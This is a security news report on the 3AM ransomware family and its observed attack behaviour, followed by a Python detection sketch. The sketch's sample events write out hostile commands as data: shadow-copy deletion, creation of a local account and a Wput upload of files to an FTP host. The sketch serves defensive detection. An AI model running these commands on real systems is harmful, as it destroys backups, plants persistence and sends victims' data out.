After failing to install the LockBit ransomware, the hacker deployed 3AM, which attracted researchers.
Symantec specialists described a new family of ransomware called 3AM, discovered in a single incident in which an unidentified hacker deployed the strain after an unsuccessful attempt to install the LockBit ransomware on the target network.
The Symantec Threat Hunter Team says that 3AM is written in Rust and represents a completely new family of malware. The ransomware attempts to stop several services on the infected computer before it starts encrypting files. After encryption is complete, 3AM deletes Volume Shadow Copies (VSS).
The 3AM ransomware got its name from the fact that it is mentioned in the ransom note; there is also a post about it on Reddit. 3AM appends the extension ".threeamtime" to encrypted files. Currently, it is not known whether the malware authors have any connections with known groups.
It is reported that during the detected attack, the attacker managed to install the ransomware program on three machines in the organization's network, but it was blocked on two of these machines.
The cybercriminals then used Cobalt Strike for subsequent exploitation and privilege escalation, as well as for intelligence purposes to identify other servers for further movement. The exact penetration route used in the attack is unclear.
In addition, the hackers added a new user for resilience and used the Wput tool to transfer victims' files to their own FTP server.
The 64-bit 3AM executable file, written in Rust, is designed to run a series of commands to stop various software related to security and backup, as well as to encrypt files that meet pre-defined criteria.
Although the exact origin of the ransomware remains unknown, according to a post on Reddit, there is evidence that the 3AM strain associated with the detected campaign is attacking several other organizations.
Symantec noted that new families of ransomware appear frequently, and most of them disappear just as quickly, or they never manage to gain significant popularity. However, the fact that 3AM was used as a fallback by a LockBit partner suggests that it may be of interest to attackers and may be seen again in the future.
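The behaviours listed above (stopping backup and security services, deleting Volume Shadow Copies, the ".threeamtime" extension, a newly added user, and Wput uploads to FTP) are all observable on an endpoint. The following is an added detection sketch, not Symantec's or the poster's code: it scans a handful of constructed, Sysmon-style events for those behaviours and raises an alert when several of them coincide on one host. The ".threeamtime" extension and the Wput tool name come from the write-up; the command-line patterns for shadow-copy deletion, service stops and user creation are assumptions about how such actions commonly look on Windows, since the page does not give the exact commands used.

```python
import re
from collections import defaultdict

THREEAM_EXT = ".threeamtime"   # extension the write-up says 3AM appends

# Indicator -> (behaviour category, regex over the process command line).
# The patterns are assumptions about how these actions commonly appear on
# Windows; the write-up names the behaviours, not the exact commands.
COMMAND_INDICATORS = {
    "vss_delete":   ("impact",          re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I)),
    "service_stop": ("defense_evasion", re.compile(r"\b(net|sc)(\.exe)?\s+stop\s+\S+", re.I)),
    "user_add":     ("persistence",     re.compile(r"\bnet1?(\.exe)?\s+user\s+\S+\s+\S+\s+/add\b", re.I)),
    "wput_ftp":     ("exfiltration",    re.compile(r"\bwput(\.exe)?\b.*\bftp://", re.I)),
}


def classify_event(event):
    """Return the (indicator, category) pairs a single event triggers."""
    hits = []
    if event["type"] == "file":
        # File renamed/created with the 3AM extension: high-confidence on its own.
        if event["path"].lower().endswith(THREEAM_EXT):
            hits.append(("threeam_ext", "impact"))
    elif event["type"] == "process":
        for name, (category, pattern) in COMMAND_INDICATORS.items():
            if pattern.search(event["cmdline"]):
                hits.append((name, category))
    return hits


def analyze(events):
    """Group hits per host. Alert when behaviours from two or more distinct
    categories coincide on a host (a lone 'net stop' is routine admin work),
    or whenever the 3AM extension itself is seen."""
    per_host = defaultdict(lambda: {"indicators": set(), "categories": set(), "alert": False})
    for ev in events:
        summary = per_host[ev["host"]]
        for name, category in classify_event(ev):
            summary["indicators"].add(name)
            summary["categories"].add(category)
    for summary in per_host.values():
        summary["alert"] = len(summary["categories"]) >= 2 or "threeam_ext" in summary["indicators"]
    return dict(per_host)


# Constructed sample events (not real telemetry); 203.0.113.5 is a documentation address.
SAMPLE_EVENTS = [
    {"host": "WS01", "type": "process", "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"host": "WS01", "type": "process", "cmdline": 'net stop "ExampleBackupSvc"'},
    {"host": "WS01", "type": "process", "cmdline": "net user svc_backup P@ss /add"},
    {"host": "WS01", "type": "process", "cmdline": r"wput.exe C:\share\finance.zip ftp://203.0.113.5/upload/"},
    {"host": "WS01", "type": "file",    "path": r"C:\Users\alice\Documents\report.docx.threeamtime"},
    {"host": "WS02", "type": "process", "cmdline": "net stop Spooler"},   # single service stop: no alert
    {"host": "WS02", "type": "process", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for host, summary in analyze(SAMPLE_EVENTS).items():
        print(host, "ALERT" if summary["alert"] else "ok", sorted(summary["indicators"]))
```

The two-category rule is what keeps the sketch useful: service stops and even shadow-copy deletion happen legitimately during maintenance, but the combination of a backup service stop, VSS deletion, a new local account and an FTP upload on the same host in a short window is the sequence the write-up describes, and the ".threeamtime" suffix is specific enough to alert on alone.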